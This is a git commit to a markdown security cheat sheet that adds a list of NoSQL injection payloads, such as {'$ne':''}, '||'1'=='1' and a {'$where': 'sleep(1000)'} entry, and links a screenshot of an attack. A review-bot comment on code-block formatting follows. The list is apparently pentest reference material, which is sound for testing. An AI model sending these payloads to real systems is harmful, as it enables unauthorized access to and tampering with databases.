Update NoSQL Injection.md

Mehdi 2024-07-27 08:47:26 +03:30 committed by GitHub
parent 033a4d2cbe
commit a5b4f9d94f
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

@ -1,5 +1,33 @@
# NoSQL Injection # NoSQL Injection
## Exploit ## Exploit
* The following are common NoSQL metacharacters you could send in an API call to manipulate the database:
```bash
$gt
{"$gt":""}
{"$gt":-1}
$ne
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
{"$nin":[1]}
|| '1'=='1
//
||'a'\\'a
'||'1'=='1';//
'/{}:
'"\;{}
'"\/$[].>
{"$where": "sleep(1000)"}
```
* **Successful NoSQL injection attack using Postman:**
![nosql](https://github.com/user-attachments/assets/3dd58830-ea8e-4444-b518-0889951a4779)
**PHP** **PHP**
The exploits are based in adding an Operator The exploits are based in adding an Operator
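
Review bot: The fenced block added under "## Exploit" is tagged `bash`, but its contents are JSON operator objects and string fragments, not shell, so the highlighting will be wrong and a reader may take the lines for commands; tag it `text`, or move the JSON objects into a `json` block. The list also mixes operator objects such as `{"$ne":""}` with string fragments such as `'||'1'=='1';//` and a `{"$where": ...}` entry without saying which input context each belongs to; a one-line label per group would fix that. The Postman screenshot carries only the alt text "nosql" and no text describing the request or response it shows, and the image line runs straight into the existing `**PHP**` line with no blank line between them, so add a short caption and a blank line before that section.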